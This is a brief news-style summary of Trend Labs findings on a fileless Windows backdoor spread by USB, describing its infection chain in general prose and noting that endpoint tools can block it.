In early August, researchers at Trend Labs were investigating a case involving a backdoor (BKDR_ANDROM.ETIN) which was being filelessly installed onto target machines using a script called JS_POWMET.DE; they speculated that it was downloaded by either users or other malware, until they finally figured out it was done via USB.
The process of infection within a Windows 10 machine has a relatively straightforward path, beginning with the insertion of the USB, which contains two malicious files both detected as TROJ_ANDROM.SVN, into said machine. The malicious code is then decrypted and loaded into the memory, or RAM (as it is fileless), and an autostart registry entry is created for every time the computer reboots. The JS_POWMET script then arrives onto the machine via the autostart registry entry, and downloads and executes a new file called TROJ_PSINJECT into the machine, which downloads a normal file (a favicon). This favicon file is then decrypted, resulting in the BKDR_ANDROM.ETIN file, which executes the final payload. In earlier versions of Windows, the process remains mostly the same except for the fact that a second backdoor is installed (DKDR_ANDROM.SMRA), which is unclear to the researchers at Trend Labs.
While these types of attacks are very sophisticated and often quite damaging, it should be known that there are many endpoint solutions that can scan and block this type of malware before execution.